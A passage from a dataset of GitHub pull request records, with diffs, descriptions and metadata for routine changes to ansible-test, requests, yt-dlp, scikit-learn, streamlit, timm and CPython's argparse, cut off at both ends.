attribute-defined-outside-init,
bad-indentation,
bad-mcs-classmethod-argument,
- broad-except,
+ broad-exception-caught,
+ broad-exception-raised,
c-extension-no-member,
cell-var-from-loop,
chained-comparison,
@@ -113,7 +114,7 @@ disable=
unused-import,
unused-variable,
unspecified-encoding, # always run with UTF-8 encoding enforced
- use-dict-literal, # many occurrences
+ use-dict-literal, # ignoring as a common style issue
use-list-literal, # many occurrences
use-implicit-booleaness-not-comparison, # many occurrences
useless-object-inheritance,
diff --git a/test/lib/ansible_test/_util/controller/sanity/pylint/config/default.cfg b/test/lib/ansible_test/_util/controller/sanity/pylint/config/default.cfg
index 6a242b8dee33ca..00b31ece78b4e8 100644
--- a/test/lib/ansible_test/_util/controller/sanity/pylint/config/default.cfg
+++ b/test/lib/ansible_test/_util/controller/sanity/pylint/config/default.cfg
@@ -10,7 +10,8 @@ disable=
attribute-defined-outside-init,
bad-indentation,
bad-mcs-classmethod-argument,
- broad-except,
+ broad-exception-caught,
+ broad-exception-raised,
c-extension-no-member,
cell-var-from-loop,
chained-comparison,
@@ -108,7 +109,7 @@ disable=
unused-import,
unused-variable,
unspecified-encoding, # always run with UTF-8 encoding enforced
- use-dict-literal, # many occurrences
+ use-dict-literal, # ignoring as a common style issue
use-list-literal, # many occurrences
use-implicit-booleaness-not-comparison, # many occurrences
useless-object-inheritance,
diff --git a/test/sanity/ignore.txt b/test/sanity/ignore.txt
index c50bd9dc5a7693..b0de6515b46566 100644
--- a/test/sanity/ignore.txt
+++ b/test/sanity/ignore.txt
@@ -129,6 +129,7 @@ lib/ansible/vars/hostvars.py pylint:disallowed-name
test/integration/targets/ansible-test-sanity/ansible_collections/ns/col/tests/integration/targets/hello/files/bad.py pylint:ansible-bad-function # ignore, required for testing
test/integration/targets/ansible-test-sanity/ansible_collections/ns/col/tests/integration/targets/hello/files/bad.py pylint:ansible-bad-import-from # ignore, required for testing
test/integration/targets/ansible-test-sanity/ansible_collections/ns/col/tests/integration/targets/hello/files/bad.py pylint:ansible-bad-import # ignore, required for testing
+test/integration/targets/ansible-test-sanity/ansible_collections/ns/col/plugins/plugin_utils/check_pylint.py pylint:disallowed-name # ignore, required for testing
test/integration/targets/ansible-test-integration/ansible_collections/ns/col/plugins/modules/hello.py pylint:relative-beyond-top-level
test/integration/targets/ansible-test-units/ansible_collections/ns/col/plugins/modules/hello.py pylint:relative-beyond-top-level
test/integration/targets/ansible-test-units/ansible_collections/ns/col/tests/unit/plugins/modules/test_hello.py pylint:relative-beyond-top-level
@@ -192,6 +193,7 @@ test/support/network-integration/collections/ansible_collections/ansible/netcomm
test/support/network-integration/collections/ansible_collections/ansible/netcommon/plugins/netconf/default.py pylint:unnecessary-comprehension
test/support/network-integration/collections/ansible_collections/cisco/ios/plugins/cliconf/ios.py pylint:arguments-renamed
test/support/network-integration/collections/ansible_collections/cisco/ios/plugins/modules/ios_config.py pep8:E501
+test/support/network-integration/collections/ansible_collections/cisco/ios/plugins/modules/ios_config.py pylint:used-before-assignment
test/support/network-integration/collections/ansible_collections/vyos/vyos/plugins/cliconf/vyos.py pylint:arguments-renamed
test/support/network-integration/collections/ansible_collections/vyos/vyos/plugins/modules/vyos_command.py pep8:E231
test/support/network-integration/collections/ansible_collections/vyos/vyos/plugins/modules/vyos_command.py pylint:disallowed-name
| ##### SUMMARY
ansible-test - Update pylint to 2.16.0.
##### ISSUE TYPE
Feature Pull Request
##### COMPONENT NAME
ansible-test
##### ADDITIONAL INFORMATION
Omitting a changelog fragment, since this is a follow-up to https://github.com/ansible/ansible/pull/79819
| https://api.github.com/repos/ansible/ansible/pulls/79878 | 2023-02-01T18:59:40Z | 2023-02-01T20:40:36Z | 2023-02-01T20:40:36Z | 2023-02-08T14:00:08Z | 3,032 | ansible/ansible | 49,211 |
Document header ordering caveats. | diff --git a/docs/user/advanced.rst b/docs/user/advanced.rst
index 8264e85d5b..cf0143ce6c 100644
--- a/docs/user/advanced.rst
+++ b/docs/user/advanced.rst
@@ -208,7 +208,7 @@ You can pass ``verify`` the path to a CA_BUNDLE file or directory with certifica
>>> requests.get('https://github.com', verify='/path/to/certfile')
-.. note:: If ``verify`` is set to a path to a directory, the directory must have been processed using
+.. note:: If ``verify`` is set to a path to a directory, the directory must have been processed using
the c_rehash utility supplied with OpenSSL.
This list of trusted CAs can also be specified through the ``REQUESTS_CA_BUNDLE`` environment variable.
@@ -899,6 +899,13 @@ Two excellent examples are `grequests`_ and `requests-futures`_.
.. _`grequests`: https://github.com/kennethreitz/grequests
.. _`requests-futures`: https://github.com/ross/requests-futures
+Header Ordering
+---------------
+
+In unusual circumstances you may want to provide headers in an ordered manner. If you pass an ``OrderedDict`` to the ``headers`` keyword argument, that will provide the headers with an ordering. *However*, the ordering of the default headers used by requests will be preferred, which means that if you override default headers in the ``headers`` keyword argument, they may appear out of order compared to other headers in that keyword argument.
+
+If this is problematic, users should consider setting the default headers on a :class:`Session <requests.Session>` object, by setting :data:`Session <requests.Session.headers>` to a custom ``OrderedDict``. That ordering will always be preferred.
+
.. _timeouts:
Timeouts
| Resolves #3096.
| https://api.github.com/repos/psf/requests/pulls/3295 | 2016-06-08T15:26:13Z | 2016-06-08T16:44:33Z | 2016-06-08T16:44:33Z | 2021-09-02T00:07:36Z | 408 | psf/requests | 32,646 |
[mixcloud] add restriction detection | diff --git a/yt_dlp/extractor/mixcloud.py b/yt_dlp/extractor/mixcloud.py
index a0c043d4bd3..c2dd078ac42 100644
--- a/yt_dlp/extractor/mixcloud.py
+++ b/yt_dlp/extractor/mixcloud.py
@@ -12,6 +12,7 @@
compat_zip
)
from ..utils import (
+ ExtractorError,
int_or_none,
parse_iso8601,
strip_or_none,
@@ -125,7 +126,20 @@ def _real_extract(self, url):
tag {
name
}
- }''', track_id, username, slug)
+ }
+ restrictedReason
+ id''', track_id, username, slug)
+
+ if not cloudcast:
+ raise ExtractorError('Track not found', expected=True)
+
+ reason = cloudcast.get('restrictedReason')
+ if reason == 'tracklist':
+ raise ExtractorError('Track unavailable in your country due to licensing restrictions', expected=True)
+ elif reason == 'repeat_play':
+ raise ExtractorError('You have reached your play limit for this track', expected=True)
+ elif reason:
+ raise ExtractorError('Track is restricted', expected=True)
title = cloudcast['name']
| ## Please follow the guide below
- You will be asked some questions, please read them **carefully** and answer honestly
- Put an `x` into all the boxes [ ] relevant to your *pull request* (like that [x])
- Use *Preview* tab to see how your *pull request* will actually look like
---
### Before submitting a *pull request* make sure you have:
- [x] At least skimmed through [contributing guidelines](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#developer-instructions) including [yt-dlp coding conventions](https://github.com/yt-dlp/yt-dlp/blob/master/CONTRIBUTING.md#yt-dlp-coding-conventions)
- [x] [Searched](https://github.com/yt-dlp/yt-dlp/search?q=is%3Apr&type=Issues) the bugtracker for similar pull requests
- [x] Checked the code with [flake8](https://pypi.python.org/pypi/flake8)
### In order to be accepted and merged into yt-dlp each piece of code must be in public domain or released under [Unlicense](http://unlicense.org/). Check one of the following options:
- [x] I am the original author of this code and I am willing to release it under [Unlicense](http://unlicense.org/)
- [ ] I am not the original author of this code but it is in public domain or released under [Unlicense](http://unlicense.org/) (provide reliable evidence)
### What is the purpose of your *pull request*?
- [ ] Bug fix
- [x] Improvement
- [ ] New extractor
- [ ] New feature
---
### Description of your *pull request* and other information
Some tracks on mixcloud can be restricted from being played. This patch adds proper detection of this, as well as throwing an error when a track is not found.
example track with licensing restriction: `https://www.mixcloud.com/mistabibs/mista-bibs-modelling-network-best-of-akon/`
| https://api.github.com/repos/yt-dlp/yt-dlp/pulls/2169 | 2021-12-30T05:16:52Z | 2021-12-31T20:11:35Z | 2021-12-31T20:11:35Z | 2021-12-31T20:11:36Z | 298 | yt-dlp/yt-dlp | 7,330 |
[MRG + 1] Ensuring that the OneHotEncoder outputs sparse matrix with given dtype #11034 | diff --git a/doc/whats_new/v0.20.rst b/doc/whats_new/v0.20.rst
index 0e206878862ae..d735b09d7b7af 100644
--- a/doc/whats_new/v0.20.rst
+++ b/doc/whats_new/v0.20.rst
@@ -496,6 +496,10 @@ Preprocessing
``inverse_transform`` on unseen labels. :issue:`9816` by :user:`Charlie Newey
<newey01c>`.
+- Fix bug in :class:`preprocessing.OneHotEncoder` which discarded the ``dtype``
+ when returning a sparse matrix output. :issue:`11042` by :user:`Daniel
+ Morales <DanielMorales9>`.
+
Feature selection
- Fixed computation of ``n_features_to_compute`` for edge case with tied CV
diff --git a/sklearn/preprocessing/data.py b/sklearn/preprocessing/data.py
index fb8f443e9c7ac..4df7c295bd834 100644
--- a/sklearn/preprocessing/data.py
+++ b/sklearn/preprocessing/data.py
@@ -1825,7 +1825,7 @@ def add_dummy_feature(X, value=1.0):
return np.hstack((np.ones((n_samples, 1)) * value, X))
-def _transform_selected(X, transform, selected="all", copy=True):
+def _transform_selected(X, transform, dtype, selected="all", copy=True):
"""Apply a transform function to portion of selected features
Parameters
@@ -1836,6 +1836,9 @@ def _transform_selected(X, transform, selected="all", copy=True):
transform : callable
A callable transform(X) -> X_transformed
+ dtype : number type
+ Desired dtype of output.
+
copy : boolean, optional
Copy X even if it could be avoided.
@@ -1869,7 +1872,10 @@ def _transform_selected(X, transform, selected="all", copy=True):
return transform(X)
else:
X_sel = transform(X[:, ind[sel]])
- X_not_sel = X[:, ind[not_sel]]
+ # The columns of X which are not transformed need
+ # to be casted to the desire dtype before concatenation.
+ # Otherwise, the stacking will cast to the higher-precision dtype.
+ X_not_sel = X[:, ind[not_sel]].astype(dtype)
if sparse.issparse(X_sel) or sparse.issparse(X_not_sel):
return sparse.hstack((X_sel, X_not_sel))
@@ -2061,7 +2067,7 @@ def fit_transform(self, X, y=None):
X : array-like, shape [n_samples, n_feature]
Input array of type int.
"""
- return _transform_selected(X, self._fit_transform,
+ return _transform_selected(X, self._fit_transform, self.dtype,
self.categorical_features, copy=True)
def _transform(self, X):
@@ -2117,7 +2123,7 @@ def transform(self, X):
X_out : sparse matrix if sparse=True else a 2-d array, dtype=int
Transformed input.
"""
- return _transform_selected(X, self._transform,
+ return _transform_selected(X, self._transform, self.dtype,
self.categorical_features, copy=True)
diff --git a/sklearn/preprocessing/tests/test_data.py b/sklearn/preprocessing/tests/test_data.py
index e3bf4096750de..e194802ef2fe5 100644
--- a/sklearn/preprocessing/tests/test_data.py
+++ b/sklearn/preprocessing/tests/test_data.py
@@ -1909,40 +1909,45 @@ def test_one_hot_encoder_dense():
[1., 0., 1., 0., 1.]]))
-def _check_transform_selected(X, X_expected, sel):
+def _check_transform_selected(X, X_expected, dtype, sel):
for M in (X, sparse.csr_matrix(X)):
- Xtr = _transform_selected(M, Binarizer().transform, sel)
+ Xtr = _transform_selected(M, Binarizer().transform, dtype, sel)
assert_array_equal(toarray(Xtr), X_expected)
-def test_transform_selected():
- X = [[3, 2, 1], [0, 1, 1]]
+@pytest.mark.parametrize("output_dtype", [np.int32, np.float32, np.float64])
+@pytest.mark.parametrize("input_dtype", [np.int32, np.float32, np.float64])
+def test_transform_selected(output_dtype, input_dtype):
+ X = np.asarray([[3, 2, 1], [0, 1, 1]], dtype=input_dtype)
- X_expected = [[1, 2, 1], [0, 1, 1]]
- _check_transform_selected(X, X_expected, [0])
- _check_transform_selected(X, X_expected, [True, False, False])
+ X_expected = np.asarray([[1, 2, 1], [0, 1, 1]], dtype=output_dtype)
+ _check_transform_selected(X, X_expected, output_dtype, [0])
+ _check_transform_selected(X, X_expected, output_dtype,
+ [True, False, False])
- X_expected = [[1, 1, 1], [0, 1, 1]]
- _check_transform_selected(X, X_expected, [0, 1, 2])
- _check_transform_selected(X, X_expected, [True, True, True])
- _check_transform_selected(X, X_expected, "all")
+ X_expected = np.asarray([[1, 1, 1], [0, 1, 1]], dtype=output_dtype)
+ _check_transform_selected(X, X_expected, output_dtype, [0, 1, 2])
+ _check_transform_selected(X, X_expected, output_dtype, [True, True, True])
+ _check_transform_selected(X, X_expected, output_dtype, "all")
- _check_transform_selected(X, X, [])
- _check_transform_selected(X, X, [False, False, False])
+ _check_transform_selected(X, X, output_dtype, [])
+ _check_transform_selected(X, X, output_dtype, [False, False, False])
-def test_transform_selected_copy_arg():
+@pytest.mark.parametrize("output_dtype", [np.int32, np.float32, np.float64])
+@pytest.mark.parametrize("input_dtype", [np.int32, np.float32, np.float64])
+def test_transform_selected_copy_arg(output_dtype, input_dtype):
# transformer that alters X
def _mutating_transformer(X):
X[0, 0] = X[0, 0] + 1
return X
- original_X = np.asarray([[1, 2], [3, 4]])
- expected_Xtr = [[2, 2], [3, 4]]
+ original_X = np.asarray([[1, 2], [3, 4]], dtype=input_dtype)
+ expected_Xtr = np.asarray([[2, 2], [3, 4]], dtype=output_dtype)
X = original_X.copy()
- Xtr = _transform_selected(X, _mutating_transformer, copy=True,
- selected='all')
+ Xtr = _transform_selected(X, _mutating_transformer, output_dtype,
+ copy=True, selected='all')
assert_array_equal(toarray(X), toarray(original_X))
assert_array_equal(toarray(Xtr), expected_Xtr)
@@ -1987,6 +1992,17 @@ def test_one_hot_encoder_categorical_features():
_check_one_hot(X, X2, cat, 5)
+@pytest.mark.parametrize("output_dtype", [np.int32, np.float32, np.float64])
+@pytest.mark.parametrize("input_dtype", [np.int32, np.float32, np.float64])
+@pytest.mark.parametrize("sparse", [True, False])
+def test_one_hot_encoder_preserve_type(input_dtype, output_dtype, sparse):
+ X = np.array([[0, 1, 0, 0], [1, 2, 0, 0]], dtype=input_dtype)
+ transformer = OneHotEncoder(categorical_features=[0, 1],
+ dtype=output_dtype, sparse=sparse)
+ X_trans = transformer.fit_transform(X)
+ assert X_trans.dtype == output_dtype
+
+
def test_one_hot_encoder_unknown_transform():
X = np.array([[0, 2, 1], [1, 0, 3], [1, 0, 2]])
y = np.array([[4, 1, 1]])
| #### Reference Issues/PRs
Original discussion at #11034
#### What does this implement/fix? Explain your changes.
| https://api.github.com/repos/scikit-learn/scikit-learn/pulls/11042 | 2018-04-28T11:35:27Z | 2018-06-06T08:59:28Z | 2018-06-06T08:59:28Z | 2018-06-06T09:00:22Z | 1,933 | scikit-learn/scikit-learn | 46,294 |
Fixed issue #2756 | diff --git a/requests/models.py b/requests/models.py
index 4270c647eb..06e843623e 100644
--- a/requests/models.py
+++ b/requests/models.py
@@ -414,7 +414,7 @@ def prepare_body(self, data, files, json=None):
content_type = None
length = None
- if json is not None:
+ if data == {} and json is not None:
content_type = 'application/json'
body = complexjson.dumps(json)
@@ -443,7 +443,7 @@ def prepare_body(self, data, files, json=None):
if files:
(body, content_type) = self._encode_files(files, data)
else:
- if data and json is None:
+ if data:
body = self._encode_params(data)
if isinstance(data, basestring) or hasattr(data, 'read'):
content_type = None
diff --git a/test_requests.py b/test_requests.py
index 28ea5730d8..b5be37fc83 100755
--- a/test_requests.py
+++ b/test_requests.py
@@ -1062,6 +1062,13 @@ def test_json_param_post_content_type_works(self):
assert 'application/json' in r.request.headers['Content-Type']
assert {'life': 42} == r.json()['json']
+ def test_json_param_post_should_not_override_data_param(self):
+ r = requests.Request(method='POST', url='http://httpbin.org/post',
+ data={'stuff': 'elixr'},
+ json={'music': 'flute'})
+ prep = r.prepare()
+ assert 'stuff=elixr' == prep.body
+
def test_response_iter_lines(self):
r = requests.get(httpbin('stream/4'), stream=True)
assert r.status_code == 200
| Now 'json' parameter will be used to prepare body only if the 'data'
parameter is not present
| https://api.github.com/repos/psf/requests/pulls/2763 | 2015-09-08T09:19:51Z | 2015-10-05T14:27:53Z | 2015-10-05T14:27:53Z | 2021-09-08T05:01:00Z | 406 | psf/requests | 32,569 |
List `str` as supported type for `show_spinner` in cache data docs | diff --git a/lib/streamlit/runtime/caching/cache_data_api.py b/lib/streamlit/runtime/caching/cache_data_api.py
index 47f9d284eb06..2e738ef447b2 100644
--- a/lib/streamlit/runtime/caching/cache_data_api.py
+++ b/lib/streamlit/runtime/caching/cache_data_api.py
@@ -413,9 +413,10 @@ def _decorator(
for an unbounded cache. (When a new entry is added to a full cache,
the oldest cached entry will be removed.) The default is None.
- show_spinner : boolean
+ show_spinner : boolean or string
Enable the spinner. Default is True to show a spinner when there is
- a cache miss.
+ a "cache miss" and the cached data is being created. If string,
+ value of show_spinner param will be used for spinner text.
persist : str or boolean or None
Optional location to persist cached data to. Passing "disk" (or True)
@@ -574,7 +575,6 @@ def __init__(
self.allow_widgets = allow_widgets
def get_stats(self) -> list[CacheStat]:
-
if isinstance(self.storage, CacheStatsProvider):
return self.storage.get_stats()
return []
| ## 📚 Context
Fixes #6207.
- What kind of change does this PR introduce?
- [x] Bugfix
- [ ] Feature
- [ ] Refactoring
- [x] Other, please describe: Doc improvement request
## 🧠 Description of Changes
- Adds `str` as a supported type for `st.cache_data`'s `show_spinner` param in the docstring.
- Note: this PR neither adds nor updates any tests as it is merely refactoring docstring text.
- [ ] This is a breaking API change
- [x] This is a visible (user-facing) change
<details><summary><h4>View revised:</h4></summary>
![image](https://user-images.githubusercontent.com/20672874/222631326-6968f7ba-dbd9-40e3-afb5-c85d45dfc8c7.png)
</details>
<details><summary><h4>View current:</h4></summary>
![image](https://user-images.githubusercontent.com/20672874/222631509-87cb72f5-16e1-40a8-ace9-f79bd988de61.png)
</details>
## 🧪 Testing Done
- [x] Screenshots included
## 🌐 References
_Does this depend on other work, documents, or tickets?_
- **Issue**: Closes #6207
---
**Contribution License Agreement**
By submitting this pull request you agree that all contributions to this project are made under the Apache 2.0 license.
| https://api.github.com/repos/streamlit/streamlit/pulls/6213 | 2023-03-03T04:30:46Z | 2023-03-03T14:49:34Z | 2023-03-03T14:49:34Z | 2023-10-05T19:29:36Z | 275 | streamlit/streamlit | 22,536 |
Device agnostic testing | diff --git a/tests/test_layers.py b/tests/test_layers.py
index da061870ab..92f6b683d3 100644
--- a/tests/test_layers.py
+++ b/tests/test_layers.py
@@ -3,6 +3,13 @@
from timm.layers import create_act_layer, set_layer_config
+import importlib
+import os
+
+torch_backend = os.environ.get('TORCH_BACKEND')
+if torch_backend is not None:
+ importlib.import_module(torch_backend)
+torch_device = os.environ.get('TORCH_DEVICE', 'cpu')
class MLP(nn.Module):
def __init__(self, act_layer="relu", inplace=True):
@@ -30,6 +37,9 @@ def _run(x, act_layer=''):
l = (out - 0).pow(2).sum()
return l
+ x = x.to(device=torch_device)
+ m.to(device=torch_device)
+
out_me = _run(x)
with set_layer_config(scriptable=True):
diff --git a/tests/test_models.py b/tests/test_models.py
index b1b2bf195a..a6411a7856 100644
--- a/tests/test_models.py
+++ b/tests/test_models.py
@@ -30,6 +30,17 @@
from timm.layers import Format, get_spatial_dim, get_channel_dim
from timm.models import get_notrace_modules, get_notrace_functions
+import importlib
+import os
+
+torch_backend = os.environ.get('TORCH_BACKEND')
+if torch_backend is not None:
+ importlib.import_module(torch_backend)
+torch_device = os.environ.get('TORCH_DEVICE', 'cpu')
+timeout = os.environ.get('TIMEOUT')
+timeout120 = int(timeout) if timeout else 120
+timeout300 = int(timeout) if timeout else 300
+
if hasattr(torch._C, '_jit_set_profiling_executor'):
# legacy executor is too slow to compile large models for unit tests
# no need for the fusion performance here
@@ -100,7 +111,7 @@ def _get_input_size(model=None, model_name='', target=None):
@pytest.mark.base
-@pytest.mark.timeout(120)
+@pytest.mark.timeout(timeout120)
@pytest.mark.parametrize('model_name', list_models(exclude_filters=EXCLUDE_FILTERS))
@pytest.mark.parametrize('batch_size', [1])
def test_model_forward(model_name, batch_size):
@@ -112,6 +123,8 @@ def test_model_forward(model_name, batch_size):
if max(input_size) > MAX_FWD_SIZE:
pytest.skip("Fixed input size model > limit.")
inputs = torch.randn((batch_size, *input_size))
+ inputs = inputs.to(torch_device)
+ model.to(torch_device)
outputs = model(inputs)
assert outputs.shape[0] == batch_size
@@ -119,7 +132,7 @@ def test_model_forward(model_name, batch_size):
@pytest.mark.base
-@pytest.mark.timeout(120)
+@pytest.mark.timeout(timeout120)
@pytest.mark.parametrize('model_name', list_models(exclude_filters=EXCLUDE_FILTERS, name_matches_cfg=True))
@pytest.mark.parametrize('batch_size', [2])
def test_model_backward(model_name, batch_size):
@@ -133,6 +146,8 @@ def test_model_backward(model_name, batch_size):
model.train()
inputs = torch.randn((batch_size, *input_size))
+ inputs = inputs.to(torch_device)
+ model.to(torch_device)
outputs = model(inputs)
if isinstance(outputs, tuple):
outputs = torch.cat(outputs)
@@ -147,7 +162,7 @@ def test_model_backward(model_name, batch_size):
@pytest.mark.cfg
-@pytest.mark.timeout(300)
+@pytest.mark.timeout(timeout300)
@pytest.mark.parametrize('model_name', list_models(
exclude_filters=EXCLUDE_FILTERS + NON_STD_FILTERS, include_tags=True))
@pytest.mark.parametrize('batch_size', [1])
@@ -155,6 +170,7 @@ def test_model_default_cfgs(model_name, batch_size):
"""Run a single forward pass with each model"""
model = create_model(model_name, pretrained=False)
model.eval()
+ model.to(torch_device)
state_dict = model.state_dict()
cfg = model.default_cfg
@@ -169,7 +185,7 @@ def test_model_default_cfgs(model_name, batch_size):
not any([fnmatch.fnmatch(model_name, x) for x in EXCLUDE_FILTERS]):
# output sizes only checked if default res <= 448 * 448 to keep resource down
input_size = tuple([min(x, MAX_FWD_OUT_SIZE) for x in input_size])
- input_tensor = torch.randn((batch_size, *input_size))
+ input_tensor = torch.randn((batch_size, *input_size), device=torch_device)
# test forward_features (always unpooled)
outputs = model.forward_features(input_tensor)
@@ -180,12 +196,14 @@ def test_model_default_cfgs(model_name, batch_size):
# test forward after deleting the classifier, output should be poooled, size(-1) == model.num_features
model.reset_classifier(0)
+ model.to(torch_device)
outputs = model.forward(input_tensor)
assert len(outputs.shape) == 2
assert outputs.shape[1] == model.num_features
# test model forward without pooling and classifier
model.reset_classifier(0, '') # reset classifier and set global pooling to pass-through
+ model.to(torch_device)
outputs = model.forward(input_tensor)
assert len(outputs.shape) == 4
if not isinstance(model, (timm.models.MobileNetV3, timm.models.GhostNet, timm.models.RepGhostNet, timm.models.VGG)):
@@ -195,6 +213,7 @@ def test_model_default_cfgs(model_name, batch_size):
if 'pruned' not in model_name: # FIXME better pruned model handling
# test classifier + global pool deletion via __init__
model = create_model(model_name, pretrained=False, num_classes=0, global_pool='').eval()
+ model.to(torch_device)
outputs = model.forward(input_tensor)
assert len(outputs.shape) == 4
if not isinstance(model, (timm.models.MobileNetV3, timm.models.GhostNet, timm.models.RepGhostNet, timm.models.VGG)):
@@ -218,13 +237,14 @@ def test_model_default_cfgs(model_name, batch_size):
@pytest.mark.cfg
-@pytest.mark.timeout(300)
+@pytest.mark.timeout(timeout300)
@pytest.mark.parametrize('model_name', list_models(filter=NON_STD_FILTERS, exclude_filters=NON_STD_EXCLUDE_FILTERS, include_tags=True))
@pytest.mark.parametrize('batch_size', [1])
def test_model_default_cfgs_non_std(model_name, batch_size):
"""Run a single forward pass with each model"""
model = create_model(model_name, pretrained=False)
model.eval()
+ model.to(torch_device)
state_dict = model.state_dict()
cfg = model.default_cfg
@@ -232,7 +252,7 @@ def test_model_default_cfgs_non_std(model_name, batch_size):
if max(input_size) > 320: # FIXME const
pytest.skip("Fixed input size model > limit.")
- input_tensor = torch.randn((batch_size, *input_size))
+ input_tensor = torch.randn((batch_size, *input_size), device=torch_device)
feat_dim = getattr(model, 'feature_dim', None)
outputs = model.forward_features(input_tensor)
@@ -246,6 +266,7 @@ def test_model_default_cfgs_non_std(model_name, batch_size):
# test forward after deleting the classifier, output should be poooled, size(-1) == model.num_features
model.reset_classifier(0)
+ model.to(torch_device)
outputs = model.forward(input_tensor)
if isinstance(outputs, (tuple, list)):
outputs = outputs[0]
@@ -254,6 +275,7 @@ def test_model_default_cfgs_non_std(model_name, batch_size):
assert outputs.shape[feat_dim] == model.num_features, 'pooled num_features != config'
model = create_model(model_name, pretrained=False, num_classes=0).eval()
+ model.to(torch_device)
outputs = model.forward(input_tensor)
if isinstance(outputs, (tuple, list)):
outputs = outputs[0]
@@ -297,7 +319,7 @@ def test_model_features_pretrained(model_name, batch_size):
@pytest.mark.torchscript
-@pytest.mark.timeout(120)
+@pytest.mark.timeout(timeout120)
@pytest.mark.parametrize(
'model_name', list_models(exclude_filters=EXCLUDE_FILTERS + EXCLUDE_JIT_FILTERS, name_matches_cfg=True))
@pytest.mark.parametrize('batch_size', [1])
@@ -312,6 +334,7 @@ def test_model_forward_torchscript(model_name, batch_size):
model.eval()
model = torch.jit.script(model)
+ model.to(torch_device)
outputs = model(torch.randn((batch_size, *input_size)))
assert outputs.shape[0] == batch_size
diff --git a/tests/test_optim.py b/tests/test_optim.py
index 9bdfd6825d..38f625fb42 100644
--- a/tests/test_optim.py
+++ b/tests/test_optim.py
@@ -15,6 +15,13 @@
from timm.optim import create_optimizer_v2
+import importlib
+import os
+
+torch_backend = os.environ.get('TORCH_BACKEND')
+if torch_backend is not None:
+ importlib.import_module(torch_backend)
+torch_device = os.environ.get('TORCH_DEVICE', 'cuda')
# HACK relying on internal PyTorch test functionality for comparisons that I don't want to write
torch_tc = TestCase()
@@ -61,7 +68,7 @@ def _test_state_dict(weight, bias, input, constructor):
def fn_base(optimizer, weight, bias):
optimizer.zero_grad()
- i = input_cuda if weight.is_cuda else input
+ i = input_device if weight.device.type != 'cpu' else input
loss = (weight.mv(i) + bias).pow(2).sum()
loss.backward()
return loss
@@ -97,28 +104,30 @@ def fn_base(optimizer, weight, bias):
# Check that state dict can be loaded even when we cast parameters
# to a different type and move to a different device.
- if not torch.cuda.is_available():
+ if torch_device == 'cpu':
+ return
+ elif torch_device == 'cuda' and not torch.cuda.is_available():
return
with torch.no_grad():
- input_cuda = Parameter(input.clone().detach().float().cuda())
- weight_cuda = Parameter(weight.clone().detach().cuda())
- bias_cuda = Parameter(bias.clone().detach().cuda())
- optimizer_cuda = constructor(weight_cuda, bias_cuda)
- fn_cuda = functools.partial(fn_base, optimizer_cuda, weight_cuda, bias_cuda)
+ input_device = Parameter(input.clone().detach().float().to(torch_device))
+ weight_device = Parameter(weight.clone().detach().to(torch_device))
+ bias_device = Parameter(bias.clone().detach().to(torch_device))
+ optimizer_device = constructor(weight_device, bias_device)
+ fn_device = functools.partial(fn_base, optimizer_device, weight_device, bias_device)
state_dict = deepcopy(optimizer.state_dict())
state_dict_c = deepcopy(optimizer.state_dict())
- optimizer_cuda.load_state_dict(state_dict_c)
+ optimizer_device.load_state_dict(state_dict_c)
# Make sure state dict wasn't modified
torch_tc.assertEqual(state_dict, state_dict_c)
for _i in range(20):
optimizer.step(fn)
- optimizer_cuda.step(fn_cuda)
- torch_tc.assertEqual(weight, weight_cuda)
- torch_tc.assertEqual(bias, bias_cuda)
+ optimizer_device.step(fn_device)
+ torch_tc.assertEqual(weight, weight_device)
+ torch_tc.assertEqual(bias, bias_device)
# validate deepcopy() copies all public attributes
def getPublicAttr(obj):
@@ -152,12 +161,15 @@ def _test_basic_cases(constructor, scheduler_constructors=None):
scheduler_constructors
)
# CUDA
- if not torch.cuda.is_available():
+ if torch_device == 'cpu':
return
+ elif torch_device == 'cuda' and not torch.cuda.is_available():
+ return
+
_test_basic_cases_template(
- torch.randn(10, 5).cuda(),
- torch.randn(10).cuda(),
- torch.randn(5).cuda(),
+ torch.randn(10, 5).to(torch_device),
+ torch.randn(10).to(torch_device),
+ torch.randn(5).to(torch_device),
constructor,
scheduler_constructors
)
| This PR changes the test suite to allow running the tests on any hardware.
In order to do this I tried to make the test suite device agnostic and allow setting the device and backend through environment variables. This is hopefully a future proof way for allowing the test suite to be run on any hardware.
I've also added the functionality to change timeouts on tests that run on hardware.
In all the changes I've tried to keep previous functionality working if using the CI in the "normal" way. If the environment variables are not used, previous values are used as defaults.
Example usage:
`TORCH_DEVICE=fancy_new_hw TORCH_BACKEND=new_torch_backend pytest tests/`
| https://api.github.com/repos/huggingface/pytorch-image-models/pulls/1993 | 2023-10-18T15:56:45Z | 2023-11-17T04:27:59Z | 2023-11-17T04:27:59Z | 2023-11-17T04:28:31Z | 2,790 | huggingface/pytorch-image-models | 16,441 |
gh-85308: argparse: Use filesystem encoding for arguments file | diff --git a/Doc/library/argparse.rst b/Doc/library/argparse.rst
index 0e62e99d706d4c..b2fa0b3c23c3a1 100644
--- a/Doc/library/argparse.rst
+++ b/Doc/library/argparse.rst
@@ -562,7 +562,7 @@ at the command line. If the ``fromfile_prefix_chars=`` argument is given to the
specified characters will be treated as files, and will be replaced by the
arguments they contain. For example::
- >>> with open('args.txt', 'w') as fp:
+ >>> with open('args.txt', 'w', encoding=sys.getfilesystemencoding()) as fp:
... fp.write('-f\nbar')
>>> parser = argparse.ArgumentParser(fromfile_prefix_chars='@')
>>> parser.add_argument('-f')
@@ -575,9 +575,18 @@ were in the same place as the original file referencing argument on the command
line. So in the example above, the expression ``['-f', 'foo', '@args.txt']``
is considered equivalent to the expression ``['-f', 'foo', '-f', 'bar']``.
+:class:`ArgumentParser` uses :term:`filesystem encoding and error handler`
+to read the file containing arguments.
+
The ``fromfile_prefix_chars=`` argument defaults to ``None``, meaning that
arguments will never be treated as file references.
+.. versionchanged:: 3.12
+ :class:`ArgumentParser` changed encoding and errors to read arguments files
+ from default (e.g. :func:`locale.getpreferredencoding(False)` and
+ ``"strict"``) to :term:`filesystem encoding and error handler`.
+ Arguments file should be encoded in UTF-8 instead of ANSI Codepage on Windows.
+
argument_default
^^^^^^^^^^^^^^^^
diff --git a/Doc/whatsnew/3.12.rst b/Doc/whatsnew/3.12.rst
index 033de1780b3d18..88013117564965 100644
--- a/Doc/whatsnew/3.12.rst
+++ b/Doc/whatsnew/3.12.rst
@@ -140,6 +140,12 @@ Changes in the Python API
select from a larger range than ``randrange(10**25)``.
(Originally suggested by Serhiy Storchaka gh-86388.)
+* :class:`argparse.ArgumentParser` changed encoding and error handler
+ for reading arguments from file (e.g. ``fromfile_prefix_chars`` option)
